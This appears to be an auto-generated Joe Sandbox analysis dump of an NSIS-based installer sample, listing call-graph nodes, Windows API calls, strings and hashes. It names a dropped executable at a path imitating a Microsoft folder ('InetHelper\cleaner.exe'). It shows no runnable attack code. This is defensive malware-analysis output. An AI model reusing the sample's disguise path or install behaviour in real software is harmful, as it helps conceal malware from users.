401503 4324 40150b 4323->4324 4326 40151e 4323->4326 4325 402c1f 17 API calls 4324->4325 4325->4326 4327 402104 4328 402c41 17 API calls 4327->4328 4329 40210b 4328->4329 4330 402c41 17 API calls 4329->4330 4331 402115 4330->4331 4332 402c41 17 API calls 4331->4332 4333 40211f 4332->4333 4334 402c41 17 API calls 4333->4334 4335 402129 4334->4335 4336 402c41 17 API calls 4335->4336 4338 402133 4336->4338 4337 402172 CoCreateInstance 4342 402191 4337->4342 4338->4337 4339 402c41 17 API calls 4338->4339 4339->4337 4340 401423 24 API calls 4341 402250 4340->4341 4342->4340 4342->4341 4343 402484 4344 402c81 17 API calls 4343->4344 4345 40248e 4344->4345 4346 402c41 17 API calls 4345->4346 4347 402497 4346->4347 4348 4024a2 RegQueryValueExW 4347->4348 4353 40288b 4347->4353 4349 4024c8 RegCloseKey 4348->4349 4350 4024c2 4348->4350 4349->4353 4350->4349 4354 40632f wsprintfW 4350->4354 4354->4349 3764 401f06 3765 402c41 17 API calls 3764->3765 3766 401f0c 3765->3766 3767 405450 24 API calls 3766->3767 3768 401f16 3767->3768 3769 4059d1 2 API calls 3768->3769 3770 401f1c 3769->3770 3771 401f3f FindCloseChangeNotification 3770->3771 3775 40288b 3770->3775 3777 406873 WaitForSingleObject 3770->3777 3771->3775 3774 401f31 3774->3771 3782 40632f wsprintfW 3774->3782 3778 40688d 3777->3778 3779 40689f GetExitCodeProcess 3778->3779 3780 4067fe 2 API calls 3778->3780 3779->3774 3781 406894 WaitForSingleObject 3780->3781 3781->3778 3782->3771 4355 403e86 4356 403fd9 4355->4356 4357 403e9e 4355->4357 4359 403fea GetDlgItem GetDlgItem 4356->4359 4374 40402a 4356->4374 4357->4356 4358 403eaa 4357->4358 4360 403eb5 SetWindowPos 4358->4360 4361 403ec8 4358->4361 4362 40435f 18 API calls 4359->4362 4360->4361 4364 403ee5 4361->4364 4365 403ecd ShowWindow 4361->4365 4366 404014 SetClassLongW 4362->4366 4363 4043ab SendMessageW 4394 404096 4363->4394 4369 403f07 4364->4369 4370 403eed DestroyWindow 4364->4370 4365->4364 4371 40140b 2 API calls 4366->4371 4367 404084 4367->4363 4368 
403fd4 4367->4368 4375 403f0c SetWindowLongW 4369->4375 4376 403f1d 4369->4376 4373 4042e8 4370->4373 4371->4374 4372 401389 2 API calls 4377 40405c 4372->4377 4373->4368 4384 404319 ShowWindow 4373->4384 4374->4367 4374->4372 4375->4368 4380 403f94 4376->4380 4381 403f29 GetDlgItem 4376->4381 4377->4367 4382 404060 SendMessageW 4377->4382 4378 40140b 2 API calls 4378->4394 4379 4042ea DestroyWindow EndDialog 4379->4373 4383 4043c6 8 API calls 4380->4383 4385 403f59 4381->4385 4386 403f3c SendMessageW IsWindowEnabled 4381->4386 4382->4368 4383->4368 4384->4368 4388 403f66 4385->4388 4389 403fad SendMessageW 4385->4389 4390 403f79 4385->4390 4398 403f5e 4385->4398 4386->4368 4386->4385 4387 40640a 17 API calls 4387->4394 4388->4389 4388->4398 4389->4380 4392 403f81 4390->4392 4393 403f96 4390->4393 4395 40140b 2 API calls 4392->4395 4396 40140b 2 API calls 4393->4396 4394->4368 4394->4378 4394->4379 4394->4387 4397 40435f 18 API calls 4394->4397 4399 40435f 18 API calls 4394->4399 4415 40422a DestroyWindow 4394->4415 4395->4398 4396->4398 4397->4394 4398->4380 4424 404338 4398->4424 4400 404111 GetDlgItem 4399->4400 4401 404126 4400->4401 4402 40412e ShowWindow EnableWindow 4400->4402 4401->4402 4427 404381 EnableWindow 4402->4427 4404 404158 EnableWindow 4409 40416c 4404->4409 4405 404171 GetSystemMenu EnableMenuItem SendMessageW 4406 4041a1 SendMessageW 4405->4406 4405->4409 4406->4409 4408 403e67 18 API calls 4408->4409 4409->4405 4409->4408 4428 404394 SendMessageW 4409->4428 4429 4063e8 lstrcpynW 4409->4429 4411 4041d0 lstrlenW 4412 40640a 17 API calls 4411->4412 4413 4041e6 SetWindowTextW 4412->4413 4414 401389 2 API calls 4413->4414 4414->4394 4415->4373 4416 404244 CreateDialogParamW 4415->4416 4416->4373 4417 404277 4416->4417 4418 40435f 18 API calls 4417->4418 4419 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4418->4419 4420 401389 2 API calls 4419->4420 4421 4042c8 4420->4421 4421->4368 4422 4042d0 ShowWindow 4421->4422 4423 4043ab 
SendMessageW 4422->4423 4423->4373 4425 404345 SendMessageW 4424->4425 4426 40433f 4424->4426 4425->4380 4426->4425 4427->4404 4428->4409 4429->4411 3832 401389 3834 401390 3832->3834 3833 4013fe 3834->3833 3835 4013cb MulDiv SendMessageW 3834->3835 3835->3834 4430 404809 4431 404819 4430->4431 4432 40483f 4430->4432 4433 40435f 18 API calls 4431->4433 4434 4043c6 8 API calls 4432->4434 4435 404826 SetDlgItemTextW 4433->4435 4436 40484b 4434->4436 4435->4432 4437 40190c 4438 401943 4437->4438 4439 402c41 17 API calls 4438->4439 4440 401948 4439->4440 4441 405afa 67 API calls 4440->4441 4442 401951 4441->4442 4443 40230c 4444 402314 4443->4444 4445 40231a 4443->4445 4446 402c41 17 API calls 4444->4446 4447 402c41 17 API calls 4445->4447 4449 402328 4445->4449 4446->4445 4447->4449 4448 402c41 17 API calls 4451 40233f WritePrivateProfileStringW 4448->4451 4450 402c41 17 API calls 4449->4450 4452 402336 4449->4452 4450->4452 4452->4448 4453 401f8c 4454 402c41 17 API calls 4453->4454 4455 401f93 4454->4455 4456 4067c2 5 API calls 4455->4456 4457 401fa2 4456->4457 4458 401fbe GlobalAlloc 4457->4458 4460 402026 4457->4460 4459 401fd2 4458->4459 4458->4460 4461 4067c2 5 API calls 4459->4461 4462 401fd9 4461->4462 4463 4067c2 5 API calls 4462->4463 4464 401fe3 4463->4464 4464->4460 4468 40632f wsprintfW 4464->4468 4466 402018 4469 40632f wsprintfW 4466->4469 4468->4466 4469->4460 4470 40238e 4471 4023c1 4470->4471 4472 402396 4470->4472 4474 402c41 17 API calls 4471->4474 4473 402c81 17 API calls 4472->4473 4475 40239d 4473->4475 4476 4023c8 4474->4476 4478 402c41 17 API calls 4475->4478 4480 4023d5 4475->4480 4481 402cff 4476->4481 4479 4023ae RegDeleteValueW RegCloseKey 4478->4479 4479->4480 4482 402d13 4481->4482 4483 402d0c 4481->4483 4482->4483 4485 402d44 4482->4485 4483->4480 4486 406255 RegOpenKeyExW 4485->4486 4487 402d72 4486->4487 4488 402d98 RegEnumKeyW 4487->4488 4489 402daf RegCloseKey 4487->4489 4491 402dd0 RegCloseKey 4487->4491 4493 402d44 6 API calls 
4487->4493 4495 402dc3 4487->4495 4488->4487 4488->4489 4490 4067c2 5 API calls 4489->4490 4492 402dbf 4490->4492 4491->4495 4494 402de0 RegDeleteKeyW 4492->4494 4492->4495 4493->4487 4494->4495 4495->4483 4496 40190f 4497 402c41 17 API calls 4496->4497 4498 401916 4497->4498 4499 405a4e MessageBoxIndirectW 4498->4499 4500 40191f 4499->4500 4501 40558f 4502 4055b0 GetDlgItem GetDlgItem GetDlgItem 4501->4502 4503 405739 4501->4503 4546 404394 SendMessageW 4502->4546 4505 405742 GetDlgItem CreateThread CloseHandle 4503->4505 4506 40576a 4503->4506 4505->4506 4508 405795 4506->4508 4509 405781 ShowWindow ShowWindow 4506->4509 4510 4057ba 4506->4510 4507 405620 4513 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4507->4513 4511 4057f5 4508->4511 4515 4057a9 4508->4515 4516 4057cf ShowWindow 4508->4516 4548 404394 SendMessageW 4509->4548 4512 4043c6 8 API calls 4510->4512 4511->4510 4521 405803 SendMessageW 4511->4521 4527 4057c8 4512->4527 4519 405695 4513->4519 4520 405679 SendMessageW SendMessageW 4513->4520 4522 404338 SendMessageW 4515->4522 4517 4057e1 4516->4517 4518 4057ef 4516->4518 4523 405450 24 API calls 4517->4523 4524 404338 SendMessageW 4518->4524 4525 4056a8 4519->4525 4526 40569a SendMessageW 4519->4526 4520->4519 4521->4527 4528 40581c CreatePopupMenu 4521->4528 4522->4510 4523->4518 4524->4511 4530 40435f 18 API calls 4525->4530 4526->4525 4529 40640a 17 API calls 4528->4529 4531 40582c AppendMenuW 4529->4531 4532 4056b8 4530->4532 4533 405849 GetWindowRect 4531->4533 4534 40585c TrackPopupMenu 4531->4534 4535 4056c1 ShowWindow 4532->4535 4536 4056f5 GetDlgItem SendMessageW 4532->4536 4533->4534 4534->4527 4538 405877 4534->4538 4539 4056e4 4535->4539 4540 4056d7 ShowWindow 4535->4540 4536->4527 4537 40571c SendMessageW SendMessageW 4536->4537 4537->4527 4541 405893 SendMessageW 4538->4541 4547 404394 SendMessageW 4539->4547 4540->4539 4541->4541 4542 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4541->4542 4544 4058d5 
SendMessageW 4542->4544 4544->4544 4545 4058fe GlobalUnlock SetClipboardData CloseClipboard 4544->4545 4545->4527 4546->4507 4547->4536 4548->4508 4549 401491 4550 405450 24 API calls 4549->4550 4551 401498 4550->4551 4559 401d14 4560 402c1f 17 API calls 4559->4560 4561 401d1b 4560->4561 4562 402c1f 17 API calls 4561->4562 4563 401d27 GetDlgItem 4562->4563 4564 402592 4563->4564 4565 404495 lstrcpynW lstrlenW 4566 403a96 4567 403aa1 4566->4567 4568 403aa5 4567->4568 4569 403aa8 GlobalAlloc 4567->4569 4569->4568 3806 402598 3807 4025c7 3806->3807 3808 4025ac 3806->3808 3810 4025fb 3807->3810 3811 4025cc 3807->3811 3809 402c1f 17 API calls 3808->3809 3816 4025b3 3809->3816 3813 402c41 17 API calls 3810->3813 3812 402c41 17 API calls 3811->3812 3814 4025d3 WideCharToMultiByte lstrlenA 3812->3814 3815 402602 lstrlenW 3813->3815 3814->3816 3815->3816 3817 402637 3816->3817 3818 402645 3816->3818 3819 402628 3816->3819 3820 405f90 WriteFile 3817->3820 3823 405fbf SetFilePointer 3819->3823 3820->3818 3824 405fdb 3823->3824 3831 40262f 3823->3831 3825 405f61 ReadFile 3824->3825 3826 405fe7 3825->3826 3827 406024 SetFilePointer 3826->3827 3828 405ffc SetFilePointer 3826->3828 3826->3831 3827->3831 3828->3827 3829 406007 3828->3829 3830 405f90 WriteFile 3829->3830 3830->3831 3831->3817 3831->3818 4570 40451e 4571 404536 4570->4571 4577 404650 4570->4577 4578 40435f 18 API calls 4571->4578 4572 4046ba 4573 404784 4572->4573 4574 4046c4 GetDlgItem 4572->4574 4579 4043c6 8 API calls 4573->4579 4575 404745 4574->4575 4576 4046de 4574->4576 4575->4573 4584 404757 4575->4584 4576->4575 4583 404704 SendMessageW LoadCursorW SetCursor 4576->4583 4577->4572 4577->4573 4580 40468b GetDlgItem SendMessageW 4577->4580 4581 40459d 4578->4581 4582 40477f 4579->4582 4603 404381 EnableWindow 4580->4603 4586 40435f 18 API calls 4581->4586 4604 4047cd 4583->4604 4589 40476d 4584->4589 4590 40475d SendMessageW 4584->4590 4587 4045aa CheckDlgButton 4586->4587 4601 404381 EnableWindow 4587->4601 
4589->4582 4594 404773 SendMessageW 4589->4594 4590->4589 4591 4046b5 4595 4047a9 SendMessageW 4591->4595 4594->4582 4595->4572 4596 4045c8 GetDlgItem 4602 404394 SendMessageW 4596->4602 4598 4045de SendMessageW 4599 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4598->4599 4600 4045fb GetSysColor 4598->4600 4599->4582 4600->4599 4601->4596 4602->4598 4603->4591 4607 405a14 ShellExecuteExW 4604->4607 4606 404733 LoadCursorW SetCursor 4606->4575 4607->4606 4608 40149e 4609 4022f7 4608->4609 4610 4014ac PostQuitMessage 4608->4610 4610->4609 4611 401c1f 4612 402c1f 17 API calls 4611->4612 4613 401c26 4612->4613 4614 402c1f 17 API calls 4613->4614 4615 401c33 4614->4615 4616 401c48 4615->4616 4617 402c41 17 API calls 4615->4617 4618 401c58 4616->4618 4619 402c41 17 API calls 4616->4619 4617->4616 4620 401c63 4618->4620 4621 401caf 4618->4621 4619->4618 4623 402c1f 17 API calls 4620->4623 4622 402c41 17 API calls 4621->4622 4624 401cb4 4622->4624 4625 401c68 4623->4625 4626 402c41 17 API calls 4624->4626 4627 402c1f 17 API calls 4625->4627 4628 401cbd FindWindowExW 4626->4628 4629 401c74 4627->4629 4632 401cdf 4628->4632 4630 401c81 SendMessageTimeoutW 4629->4630 4631 401c9f SendMessageW 4629->4631 4630->4632 4631->4632 4633 402aa0 SendMessageW 4634 402ac5 4633->4634 4635 402aba InvalidateRect 4633->4635 4635->4634 4636 402821 4637 402827 4636->4637 4638 402ac5 4637->4638 4639 40282f FindClose 4637->4639 4639->4638 4640 4015a3 4641 402c41 17 API calls 4640->4641 4642 4015aa SetFileAttributesW 4641->4642 4643 4015bc 4642->4643 3510 4034a5 SetErrorMode GetVersion 3511 4034e4 3510->3511 3512 4034ea 3510->3512 3513 4067c2 5 API calls 3511->3513 3514 406752 3 API calls 3512->3514 3513->3512 3515 403500 lstrlenA 3514->3515 3515->3512 3516 403510 3515->3516 3517 4067c2 5 API calls 3516->3517 3518 403517 3517->3518 3519 4067c2 5 API calls 3518->3519 3520 40351e 3519->3520 3521 4067c2 5 API calls 3520->3521 3522 40352a #17 OleInitialize SHGetFileInfoW 
3521->3522 3600 4063e8 lstrcpynW 3522->3600 3525 403576 GetCommandLineW 3601 4063e8 lstrcpynW 3525->3601 3527 403588 3528 405cea CharNextW 3527->3528 3529 4035ad CharNextW 3528->3529 3530 4036d7 GetTempPathW 3529->3530 3540 4035c6 3529->3540 3602 403474 3530->3602 3532 4036ef 3533 4036f3 GetWindowsDirectoryW lstrcatW 3532->3533 3534 403749 DeleteFileW 3532->3534 3535 403474 12 API calls 3533->3535 3612 402f30 GetTickCount GetModuleFileNameW 3534->3612 3538 40370f 3535->3538 3536 405cea CharNextW 3536->3540 3538->3534 3541 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3538->3541 3539 40375d 3542 403814 ExitProcess OleUninitialize 3539->3542 3546 403800 3539->3546 3553 405cea CharNextW 3539->3553 3540->3536 3544 4036c2 3540->3544 3545 4036c0 3540->3545 3543 403474 12 API calls 3541->3543 3547 40394a 3542->3547 3548 40382a 3542->3548 3551 403741 3543->3551 3699 4063e8 lstrcpynW 3544->3699 3545->3530 3642 403ad8 3546->3642 3549 403952 GetCurrentProcess OpenProcessToken 3547->3549 3550 4039ce ExitProcess 3547->3550 3702 405a4e 3548->3702 3557 40396a LookupPrivilegeValueW AdjustTokenPrivileges 3549->3557 3558 40399e 3549->3558 3551->3534 3551->3542 3568 40377c 3553->3568 3557->3558 3561 4067c2 5 API calls 3558->3561 3564 4039a5 3561->3564 3562 403840 3565 4059b9 5 API calls 3562->3565 3563 4037da 3566 405dc5 18 API calls 3563->3566 3567 4039ba ExitWindowsEx 3564->3567 3571 4039c7 3564->3571 3569 403845 lstrcatW 3565->3569 3570 4037e6 3566->3570 3567->3550 3567->3571 3568->3562 3568->3563 3572 403861 lstrcatW lstrcmpiW 3569->3572 3573 403856 lstrcatW 3569->3573 3570->3542 3700 4063e8 lstrcpynW 3570->3700 3711 40140b 3571->3711 3572->3542 3575 40387d 3572->3575 3573->3572 3577 403882 3575->3577 3578 403889 3575->3578 3580 40591f 4 API calls 3577->3580 3582 40599c 2 API calls 3578->3582 3579 4037f5 3701 4063e8 lstrcpynW 3579->3701 3583 403887 3580->3583 3584 40388e SetCurrentDirectoryW 3582->3584 3583->3584 3585 4038a9 3584->3585 3586 40389e 
3584->3586 3707 4063e8 lstrcpynW 3585->3707 3706 4063e8 lstrcpynW 3586->3706 3589 40640a 17 API calls 3590 4038e8 DeleteFileW 3589->3590 3591 4038f5 CopyFileW 3590->3591 3597 4038b7 3590->3597 3591->3597 3592 40393e 3593 4061ae 36 API calls 3592->3593 3595 403945 3593->3595 3594 4061ae 36 API calls 3594->3597 3595->3542 3596 40640a 17 API calls 3596->3597 3597->3589 3597->3592 3597->3594 3597->3596 3599 403929 CloseHandle 3597->3599 3708 4059d1 CreateProcessW 3597->3708 3599->3597 3600->3525 3601->3527 3603 40667c 5 API calls 3602->3603 3604 403480 3603->3604 3605 40348a 3604->3605 3606 405cbd 3 API calls 3604->3606 3605->3532 3607 403492 3606->3607 3608 40599c 2 API calls 3607->3608 3609 403498 3608->3609 3714 405f0d 3609->3714 3718 405ede GetFileAttributesW CreateFileW 3612->3718 3614 402f73 3641 402f80 3614->3641 3719 4063e8 lstrcpynW 3614->3719 3616 402f96 3617 405d09 2 API calls 3616->3617 3618 402f9c 3617->3618 3720 4063e8 lstrcpynW 3618->3720 3620 402fa7 GetFileSize 3621 4030a8 3620->3621 3625 402fbe 3620->3625 3622 402e8e 32 API calls 3621->3622 3624 4030af 3622->3624 3623 403447 ReadFile 3623->3625 3627 4030eb GlobalAlloc 3624->3627 3624->3641 3722 40345d SetFilePointer 3624->3722 3625->3621 3625->3623 3626 403143 3625->3626 3633 402e8e 32 API calls 3625->3633 3625->3641 3630 402e8e 32 API calls 3626->3630 3629 403102 3627->3629 3634 405f0d 2 API calls 3629->3634 3630->3641 3631 4030cc 3632 403447 ReadFile 3631->3632 3636 4030d7 3632->3636 3633->3625 3635 403113 CreateFileW 3634->3635 3637 40314d 3635->3637 3635->3641 3636->3627 3636->3641 3721 40345d SetFilePointer 3637->3721 3639 40315b 3640 4031d6 44 API calls 3639->3640 3640->3641 3641->3539 3641->3641 3643 4067c2 5 API calls 3642->3643 3644 403aec 3643->3644 3645 403af2 GetUserDefaultUILanguage 3644->3645 3646 403b04 3644->3646 3723 40632f wsprintfW 3645->3723 3648 4062b6 3 API calls 3646->3648 3650 403b34 3648->3650 3649 403b02 3724 403dae 3649->3724 3651 403b53 lstrcatW 3650->3651 3652 4062b6 3 API 

                                                                                                                                                                                                              Control-flow Graph

[Control-flow graph starting at 004034A5; legend: Executed / Not Executed; graph not reproduced]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(004366E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                                                                                                              • CharNextW.USER32(00000000,004C1000,00000020,004C1000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002000,004D5000,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004D5000,00001FFB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,\Temp), ref: 00403705
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00001FFC,004D5000,004D5000,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,Low), ref: 00403721
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004D5000,004D5000,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004D5000,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004D1000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                              • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,~nsu), ref: 0040384D
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,0040A328), ref: 0040385C
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D5000,.tmp), ref: 00403867
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004D5000,004CD000,004D5000,.tmp,004D5000,~nsu,004C1000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004D5000,004D5000,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(004326E8,004326E8,?,00471000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                                                                                                              • CopyFileW.KERNEL32(004DD000,004326E8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,004326E8,004326E8,?,004326E8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                              • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu$&C
                                                                                                                                                                                                              • API String ID: 424501083-3710082758
                                                                                                                                                                                                              • Opcode ID: e783125dba734ed597e1940b01dc1cab2e95ffc2bcbea3dcea6e2450cdaed4c7
                                                                                                                                                                                                              • Instruction ID: a55e1ba19ca46540f0e819ab7f1242b390505e394ddfc82397b04f5546c7078a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e783125dba734ed597e1940b01dc1cab2e95ffc2bcbea3dcea6e2450cdaed4c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D1D671600310AAD7206F769D49B3B3AACEB4074AF10443FF985B62D2DBBD8D45876E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

[Control-flow graph starting at 00405AFA; legend: Executed / Not Executed; graph not reproduced]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,004D5000,74DF2EE0,00000000), ref: 00405B23
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00456730,\*.*), ref: 00405B6B
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00456730,?,?,004D5000,74DF2EE0,00000000), ref: 00405B94
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00456730,?,?,?,0040A014,?,00456730,?,?,004D5000,74DF2EE0,00000000), ref: 00405BA4
                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                              • String ID: 0gE$\*.*
                                                                                                                                                                                                              • API String ID: 2035342205-2711052210
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(004D5000,0045E778,0045A730,00405E0E,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0), ref: 00406736
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                              • String ID: xE
                                                                                                                                                                                                              • API String ID: 2295610775-407097786
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,004D5000,74DF3420,004C1000,00000000), ref: 00403AF2
                                                                                                                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D1000,00446728), ref: 00403B59
                                                                                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000,00000002,004D5000), ref: 00403BD9
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,004C5000,004D1000,00446728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446728,00000000), ref: 00403BEC
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"), ref: 00403BF7
                                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C5000), ref: 00403C40
                                                                                                                                                                                                              • RegisterClassW.USER32(004681E0), ref: 00403C7D
                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
